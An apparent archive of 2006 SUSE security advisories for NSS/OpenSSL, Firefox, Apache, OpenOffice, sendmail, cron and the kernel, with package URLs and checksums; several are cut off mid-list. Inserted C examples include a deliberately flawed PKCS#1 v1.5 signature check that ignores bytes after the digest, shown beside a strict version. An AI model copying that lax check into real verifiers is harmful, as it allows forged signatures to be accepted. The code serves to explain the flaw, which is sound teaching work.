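/* Hardened check: the EM must have exactly the expected layout, with the
 * padding computed from the EM length so that T sits flush against the end
 * and there is no room for excess data. Returns 1 when valid, 0 otherwise. */
int pkcs1_v15_check_strict(const unsigned char *em, size_t em_len,
                           const unsigned char *t, size_t t_len)
{
    size_t ps_len;

    if (em_len < t_len + 11)
        return 0;
    if (em[0] != 0x00 || em[1] != 0x01)
        return 0;
    ps_len = em_len - t_len - 3;        /* padding must fill everything else */
    for (size_t i = 2; i < 2 + ps_len; i++)
        if (em[i] != 0xFF)
            return 0;
    if (em[2 + ps_len] != 0x00)
        return 0;
    return memcmp(em + 3 + ps_len, t, t_len) == 0;
}

/* Flawed check of the class this advisory describes: it scans forward to
 * the 0x00 separator, compares the DigestInfo that follows, and never
 * looks at the bytes after it. That unchecked tail is exactly the slack a
 * forger needs when the public exponent is small (e = 3). */
int pkcs1_v15_check_lax(const unsigned char *em, size_t em_len,
                        const unsigned char *t, size_t t_len)
{
    size_t i;

    if (em_len < 11 || em[0] != 0x00 || em[1] != 0x01)
        return 0;
    for (i = 2; i < em_len && em[i] == 0xFF; i++)
        ;
    if (i < 10 || i >= em_len || em[i] != 0x00)  /* at least 8 bytes of PS */
        return 0;
    i++;
    if (em_len - i < t_len)
        return 0;
    return memcmp(em + i, t, t_len) == 0;  /* bytes after T are never checked */
}

int main(void)
{
    unsigned char t[20];                /* constructed stand-in DigestInfo */
    unsigned char em[64];               /* constructed stand-in for a 512-bit modulus */

    memset(t, 0xAB, sizeof t);
    pkcs1_v15_encode(em, sizeof em, t, sizeof t);
    printf("well-formed EM:   strict=%d lax=%d\n",
           pkcs1_v15_check_strict(em, sizeof em, t, sizeof t),
           pkcs1_v15_check_lax(em, sizeof em, t, sizeof t));

    /* Same DigestInfo, minimum padding, then 33 bytes of junk after T. */
    memset(em, 0x42, sizeof em);
    em[0] = 0x00;
    em[1] = 0x01;
    memset(em + 2, 0xFF, 8);
    em[10] = 0x00;
    memcpy(em + 11, t, sizeof t);
    printf("EM with excess:   strict=%d lax=%d\n",
           pkcs1_v15_check_strict(em, sizeof em, t, sizeof t),
           pkcs1_v15_check_lax(em, sizeof em, t, sizeof t));
    return 0;
}
```

   The two checks agree on a well-formed EM and disagree on one that carries
   bytes after the DigestInfo; only the strict form is acceptable in a
   verifier, which is what the updated packages restore.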

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please close and restart running programs using SSL to verify PKCS signatures
   (web browsers, E-Mail clients, etc.)

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/mozilla-nss-3.11-21.7.i586.rpm
  2ca59cfa949741f970019250db6e7890
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/mozilla-nss-devel-3.11-21.7.i586.rpm
  5176d16fddcc9085c9c62633df1c1e7a
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-0.9.8a-18.7.i586.rpm
  f3c5cb97da8acb6a4c4ef9434cb89e1a
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-devel-0.9.8a-18.7.i586.rpm
  20c03b69fb682e341fbcbd6e0b7fa08d

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/mozilla-nss-3.10-12.3.i586.rpm
  f1040a75792a24085ffeacaf4fdbbadb
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/mozilla-nss-devel-3.10-12.3.i586.rpm
  f666ce57dcedd14078d2289831658ec2
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-0.9.7g-2.8.i586.rpm
  2a2ec627749b0ebef913522777d6d10a
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-devel-0.9.7g-2.8.i586.rpm
  0889bf02be6b048e62109510b711debf

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-0.9.7e-3.4.i586.rpm
  ef34f676b7c3279c368d044a35761e23
   

[Full-disclosure] SUSE Security Announcement: MozillaFirefox, MozillaThunderbird, Seamonkey (SUSE-SA:2006:048)

2006-08-16 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:MozillaFirefox,MozillaThunderbird,Seamonkey
Announcement ID:SUSE-SA:2006:048
Date:   Wed, 16 Aug 2006 17:00:00 +
Affected Products:  Novell Linux Desktop 9
SLE SDK 10
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE SLES 10
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CVE-2006-3113, CVE-2006-3677, CVE-2006-3801
CVE-2006-3802, CVE-2006-3803, CVE-2006-3804
CVE-2006-3805, CVE-2006-3806, CVE-2006-3807
CVE-2006-3808, CVE-2006-3809, CVE-2006-3810
CVE-2006-3811, CVE-2006-3812, MFSA 2006-01
MFSA 2006-10, MFSA 2006-44, MFSA 2006-45
MFSA 2006-46, MFSA 2006-47, MFSA 2006-48
MFSA 2006-49, MFSA 2006-50, MFSA 2006-51
MFSA 2006-52, MFSA 2006-53, MFSA 2006-54
MFSA 2006-55, MFSA 2006-56

Content of This Advisory:
1) Security Vulnerability Resolved:
 various mozilla browser security problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   To fix various security problems we released update packages that
   bring Mozilla Firefox to version 1.5.0.6, MozillaThunderbird to
   version 1.5.0.5 and the Seamonkey Suite to version 1.0.3.

   Note that on Novell Linux Desktop 9 and SUSE Linux 9.2 up to 10.0
   this is a major version upgrade of Mozilla Firefox, please check if
   your Firefox plugins are still working.

   Still missing are updates for the (discontinued) Mozilla Suite.

   More details on the security problems can be found on:
http://www.mozilla.org/projects/security/known-vulnerabilities.html

   The update includes fixes to the following security problems:
   - CVE-2006-3801/MFSA 2006-44: Code execution through deleted frame reference

 Thilo Girmann discovered that in certain circumstances a JavaScript
 reference to a frame or window was not properly cleared when the
 referenced content went away, and he demonstrated that this pointer
 to a deleted object could be used to execute native code supplied
 by the attacker.

   - CVE-2006-3677/MFSA 2006-45: Javascript navigator Object Vulnerability

 An anonymous researcher for TippingPoint and the Zero Day Initiative
 showed that when used in a web page Java would reference properties
 of the window.navigator object as it started up. If the page replaced
 the navigator object before starting Java then the browser would
 crash in a way that could be exploited to run native code supplied
 by the attacker.

   - CVE-2006-3113/MFSA 2006-46: Memory corruption with simultaneous events

 Secunia Research has discovered a vulnerability in Mozilla Firefox
 1.5 branch, which can be exploited by malicious people to compromise
 a user's system.

 The vulnerability is caused by a memory corruption error within
 the handling of simultaneously happening XPCOM events, which leads
 to use of a deleted timer object. This generally results in a crash
 but potentially could be exploited to execute arbitrary code on a
 user's system when a malicious website is visited.

   - CVE-2006-3802/MFSA 2006-47: Native DOM methods can be hijacked across
 domains

 A malicious page can hijack native DOM methods on a document object
 in another domain, which will run the attacker's script when called
 by the victim page.  This could be used to steal login cookies,
 password, or other sensitive data on the target page, or to perform
 actions on behalf of a logged-in user.

 Access checks on all other properties and document nodes are
 performed correctly. This cross-site scripting (XSS) attack is
 limited to pages which use standard DOM methods of the top-level
 document object, such as document.getElementById(). This includes
 many popular sites, especially the newer ones that offer rich

[Full-disclosure] SUSE Security Announcement: apache, apache2 mod_rewrite problem (SUSE-SA:2006:043)

2006-07-28 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:apache,apache2
Announcement ID:SUSE-SA:2006:043
Date:   Fri, 28 Jul 2006 17:00:00 +
Affected Products:  SLE SDK 10
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE SLES 10
SUSE SLES 9
Vulnerability Type: remote denial of service
Severity (1-10):6
SUSE Default Package:   yes
Cross-References:   CVE-2005-3352, CVE-2006-3747

Content of This Advisory:
1) Security Vulnerability Resolved:
 Apache off by one security problem
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The following security problem was fixed in the Apache and Apache 2
   web servers:

   mod_rewrite: Fix an off-by-one security problem in the ldap scheme
   handling. For some RewriteRules this could lead to a pointer being
   written out of bounds. Depending on stack alignment this could be
   used to potentially execute code.

   The mod_rewrite module is not enabled per default in our packages.

   This problem is tracked by the Mitre CVE ID CVE-2006-3747.

   A more detailed description of this problem is available in:

   http://www.apache.org/dist/httpd/Announcement2.0.html

   For SUSE Linux 10.0, 10.1 and SUSE Linux Enterprise 10 an old bug was
   additionally fixed that we had missed when forward-porting to the
   Apache 2.2 packages:

   mod_imap: Fixes a cross-site-scripting bug in the imagemap module.
   This issue is tracked by the Mitre CVE ID CVE-2005-3352.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please close and restart all running instances of Apache after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-2.2.0-21.7.i586.rpm
  124342d5311b318586d91d12117bdd2a
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-prefork-2.2.0-21.7.i586.rpm
  4a73ae89777943f4127743f817f0a0a5
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-worker-2.2.0-21.7.i586.rpm
  1905af7f606986f1818ebed5bd3382d5

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-2.0.54-10.5.i586.rpm
  adf6c8665b9f0f36c6a7720a8f1bfad1
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-prefork-2.0.54-10.5.i586.rpm
  1cbcec6896dc46504140177b48ca014d
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-worker-2.0.54-10.5.i586.rpm
  f721e397c518cc6160886a1296e5a109

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-2.0.53-9.12.i586.rpm
  e6ae2ee1353c1f1c31c0595b60d18137
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-prefork-2.0.53-9.12.i586.rpm
  cb02c5f97671d2ab0a64215ed9987c2f
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-worker-2.0.53-9.12.i586.rpm
  b8872991cf54d99659e60d860d0c44e8

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-2.0.50-7.14.i586.rpm
  9365d403839e7c0740aae1e2f1b6cdfc
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-prefork-2.0.50-7.14.i586.rpm
  97d506d68996f80ff6494a127f7c
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-worker-2.0.50-7.14.i586.rpm
  f649e8eb98d43d6a44231f0c7453c9b2

   Power PC Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/apache2-2.2.0-21.7.ppc.rpm
  133b02c7a3a52a2bf144ece351ba00a1
   

[Full-disclosure] SUSE Security Announcement: OpenOffice_org remote code execution (SUSE-SA:2006:040)

2006-07-03 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:OpenOffice_org
Announcement ID:SUSE-SA:2006:040
Date:   Mon, 03 Jul 2006 16:00:00 +
Affected Products:  Novell Linux Desktop 9
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CVE-2006-2198, CVE-2006-2199, CVE-2006-3117

Content of This Advisory:
1) Security Vulnerability Resolved:
 OpenOffice_org security problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The following security problems were found and fixed in OpenOffice_org:

   - CVE-2006-2198:

 A security vulnerability in OpenOffice.org may make it possible to
 inject basic code into documents which is executed upon loading
 of the document. The user will not be asked or notified and the
 macro will have full access to system resources with current user's
 privileges. As a result, the macro may delete/replace system files,
 read/send private data and/or cause additional security issues.

 Note that this attack works even with Macro execution disabled.

 This attack allows remote attackers to modify files / execute code
 as the user opening the document.

   - CVE-2006-2199:

 A security vulnerability related to OpenOffice.org documents
 may allow certain Java applets to break through the sandbox
 and therefore have full access to system resources with current
 user privileges. The offending Applets may be constructed to
 destroy/replace system files, read or send private data, and/or
 cause additional security issues.

 Since Java applet support is only there for historical reasons,
 as StarOffice was providing browser support, the support has now
 been disabled by default.

   - CVE-2006-3117:

 A buffer overflow in the XML UTF8 converter allows for a value to
 be written to an arbitrary location in memory. This may lead to
 command execution in the context of the current user.


2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please close and restart all running instances of OpenOffice_org
   after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-2.0.2-27.12.i586.rpm
  649b45c223e2eef491f3e89b457be3f2
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-af-2.0.2-27.12.i586.rpm
  09afa80d882ab9c1388139874e7107e9
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-ar-2.0.2-27.12.i586.rpm
  70d9cf35ca87e78f8a30821ba271ac30
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-be-BY-2.0.2-27.12.i586.rpm
  d044a2f22c518322ea35388adb7d8bd0
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-bg-2.0.2-27.12.i586.rpm
  37cac5cbe14215491e65f78fd7d1f013
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-ca-2.0.2-27.12.i586.rpm
  f458c2b61425e171b556a40e918d07db
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-cs-2.0.2-27.12.i586.rpm
  0af5024dafc41d80456eb14950cbcdb5
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-cy-2.0.2-27.12.i586.rpm
  ef66e97820d34e6f61c0f0dc61e0f690
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-da-2.0.2-27.12.i586.rpm
  

[Full-disclosure] SUSE Security Announcement: sendmail remote denial of service attack (SUSE-SA:2006:032)

2006-06-14 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:sendmail
Announcement ID:SUSE-SA:2006:032
Date:   Wed, 14 Jun 2006 19:00:00 +
Affected Products:  SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Enterprise Server 8
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: remote denial of service
Severity (1-10):5
SUSE Default Package:   no
Cross-References:   CVE-2006-1173, VU#146718

Content of This Advisory:
1) Security Vulnerability Resolved:
 sendmail remote denial of service attack
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The Mail Transfer Agent sendmail has a remotely exploitable problem,
   where specially crafted MIME messages can crash sendmail and block
   queue processing.

   This issue is tracked by the Mitre CVE ID CVE-2006-1173 and CERT
   VU#146718.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please close and restart all running instances of sendmail after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/sendmail-8.13.6-9.3.i586.rpm
  1e3fa1b7a729d2b260a4da6d9ff962f4

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/sendmail-8.13.4-8.6.i586.rpm
  70a41db80164fb7d50e823774566ea9e

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/sendmail-8.13.3-5.6.i586.rpm
  94679162ea3b479f20362f0d01ea4d72

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/sendmail-8.13.1-5.6.i586.rpm
  10e79f3a40ec0c25911cf2549009d609

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/sendmail-8.12.11-2.7.i586.rpm
  adc59ac9fa4ba76743bd073e0334b9d9

   Power PC Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/sendmail-8.13.6-9.3.ppc.rpm
  81580c25511daa9862a1dd8f5ca7d48b

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/sendmail-8.13.4-8.6.ppc.rpm
  ff81143d1dee29c58aea6038a952c903

   x86-64 Platform:

   SUSE LINUX 10.1:
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/sendmail-8.13.6-9.3.x86_64.rpm
  8f724bcf3c0aaac8923241c9f3288c40

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/sendmail-8.13.4-8.6.x86_64.rpm
  40fc8a5f7ad12159528b8cc1d4c2173f

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/sendmail-8.13.3-5.6.x86_64.rpm
  d8b8ba804ac1a04b22d673c52d654f69

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/sendmail-8.13.1-5.6.x86_64.rpm
  6dcf297dbbcfb5d2b7d0a55efb9c3099

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/sendmail-8.12.11-2.7.x86_64.rpm
  dd3ed5bd5318928a9bfe4320eed67027

   Sources:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/sendmail-8.13.6-9.3.src.rpm
  7ed5b46eb2ed2a18becadf43b8cba7b1

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/sendmail-8.13.4-8.6.src.rpm
  0f93d3d608305d44667ec1b35a76e626

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/sendmail-8.13.3-5.6.src.rpm
  c9ac83c770a63f94fe18a156898ffe70

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/sendmail-8.13.1-5.6.src.rpm
  

[Full-disclosure] SUSE Security Announcement: cron local privilege escalation (SUSE-SA:2006:027)

2006-05-31 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:cron
Announcement ID:SUSE-SA:2006:027
Date:   Wed, 31 May 2006 15:00:00 +
Affected Products:  SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: local privilege escalation
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CVE-2006-2607

Content of This Advisory:
1) Security Vulnerability Resolved:
 local privilege escalation using cron
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Vixie Cron is the default CRON daemon in all SUSE Linux based
   distributions.

   The code in do_command.c in Vixie cron does not check the return code
   of a setuid call, which might allow local users to gain root privileges
   if setuid fails in cases such as PAM failures or resource limits.

   This problem is known to affect only distributions with Linux 2.6
   kernels, but the package was updated for all distributions for
   completeness.

   This problem is tracked by the Mitre CVE ID CVE-2006-2607.
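   The pattern the advisory describes, as an added example in C (this is not
   Vixie cron's or SUSE's code): a daemon that runs jobs on behalf of users
   has to treat every credential-changing call as fallible. setuid() can fail
   even for root, for instance when the target user is over a process limit
   or a PAM session step fails, and a caller that ignores the return code
   goes on to run the job with root's credentials. The function below checks
   each step, verifies the result with the get*id() calls, and confirms that
   root cannot be regained; the job should only be executed when it returns
   0. The example drops to the caller's own uid/gid when run, so it works
   both as root and as an unprivileged user.

```c
/*
 * Added example (not Vixie cron's or SUSE's code): dropping privileges
 * before running a user's job, with every step checked. Running this as an
 * unprivileged user only exercises the "same uid" path; as root it performs
 * the full group and user switch.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 when the process now runs as uid/gid with no way back to root,
 * -1 (with errno set) when any step fails. On -1 the caller must refuse to
 * run the job rather than continue. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Supplementary groups can only be changed by root; clear them so the
     * job does not inherit root's group memberships. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;

    /* Group before user: once the uid is dropped, setgid() is no longer
     * permitted. */
    if (setgid(gid) != 0)
        return -1;

    /* The check the advisory says do_command.c lacked: setuid() may fail
     * even for root (PAM failure, resource limit on the target user). */
    if (setuid(uid) != 0)
        return -1;

    /* Confirm the kernel agrees with what was requested. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }

    /* For a non-root target, privileges must be unrecoverable. */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Stand-alone demo: drop to the invoking user's own credentials. */
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (drop_privileges(uid, gid) != 0) {
        fprintf(stderr, "refusing to run job: %s\n", strerror(errno));
        return 1;
    }
    printf("running as uid=%lu gid=%lu, root not regainable\n",
           (unsigned long)uid, (unsigned long)gid);
    return 0;
}
```

   The order matters: groups first, then gid, then uid, each checked, and
   the final setuid(0) probe turns a silent failure into a hard error.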

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please restart cron after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cron-4.1-45.3.i586.rpm
  e497e8d493f1b94c0891af1026be4d0a

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/cron-4.1-26.2.i586.rpm
  a7daa9be8f6d1f3d5b87904e934ee235

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/cron-4.1-20.2.i586.rpm
  feabbd699c9504dc4cf0bf0ba91e6f2d

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/cron-4.1-14.2.i586.rpm
  0979cea40c43166044c66364b148101b

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/cron-3.0.1-920.12.i586.rpm
  e140f798e6146f52ca2621a6ef678a45

   Power PC Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cron-4.1-45.3.ppc.rpm
  0b0550667503fc422ae7601b4cb513e6

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/cron-4.1-26.2.ppc.rpm
  711aeec2e8bfcb02835478e3c5bc62c8

   x86-64 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cron-4.1-45.3.x86_64.rpm
  01885af8563e8f2e093b7741e0e7ee95

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/cron-4.1-26.2.x86_64.rpm
  3716db1e6d608fc4714b8ac137c94059

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/cron-4.1-20.2.x86_64.rpm
  4287461b019ece311e32082fd87bc0a9

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/cron-4.1-14.2.x86_64.rpm
  574294ae7f583add41bd45774988cb4e

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/cron-3.0.1-920.12.x86_64.rpm
  6b26840c02592f7978d841f99743371d

   Sources:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/cron-4.1-45.3.src.rpm
  f43d85f87f2571b7a72c580f40027abd

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/cron-4.1-26.2.src.rpm
  78ea0581677076016e90b109e6154b12

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/cron-4.1-20.2.src.rpm
 

[Full-disclosure] SUSE Security Announcement: kernel (SUSE-SA:2006:028)

2006-05-31 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:kernel
Announcement ID:SUSE-SA:2006:028
Date:   Wed, 31 May 2006 18:00:00 +
Affected Products:  SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: remote denial of service
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CVE-2005-4798, CVE-2006-0095, CVE-2006-0457
CVE-2006-0554, CVE-2006-0555, CVE-2006-0557
CVE-2006-0741, CVE-2006-0742, CVE-2006-0744
CVE-2006-1055, CVE-2006-1056, CVE-2006-1242
CVE-2006-1342, CVE-2006-1523, CVE-2006-1524
CVE-2006-1525, CVE-2006-1527, CVE-2006-1863
CVE-2006-1864, CVE-2006-2271, CVE-2006-2272
CVE-2006-2274

Content of This Advisory:
1) Security Vulnerability Resolved:
 various kernel security problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The Linux kernel has been updated to fix various security problems,
   listed below.

   Note that some of the updates have already been released end of last
   week.

   - AppArmor in SUSE Linux 10.0 and SUSE Linux Enterprise Server 9 SP3
 could crash the machine through a negative dentry reference caused,
 for instance, by a path component vanishing during a system call of a
 profiled application.

   - AppArmor in SUSE Linux 10.0 and SUSE Linux Enterprise Server 9 SP3
 failed to prevent PTRACE_ME on a confined parent, allowing an
 infected called program to gain the same rights as its parent
 process.

   - CVE-2006-2274: Linux SCTP allows remote attackers to cause a
 denial of service (infinite recursion and crash) via a packet that
 contains two or more DATA fragments, which causes an skb pointer
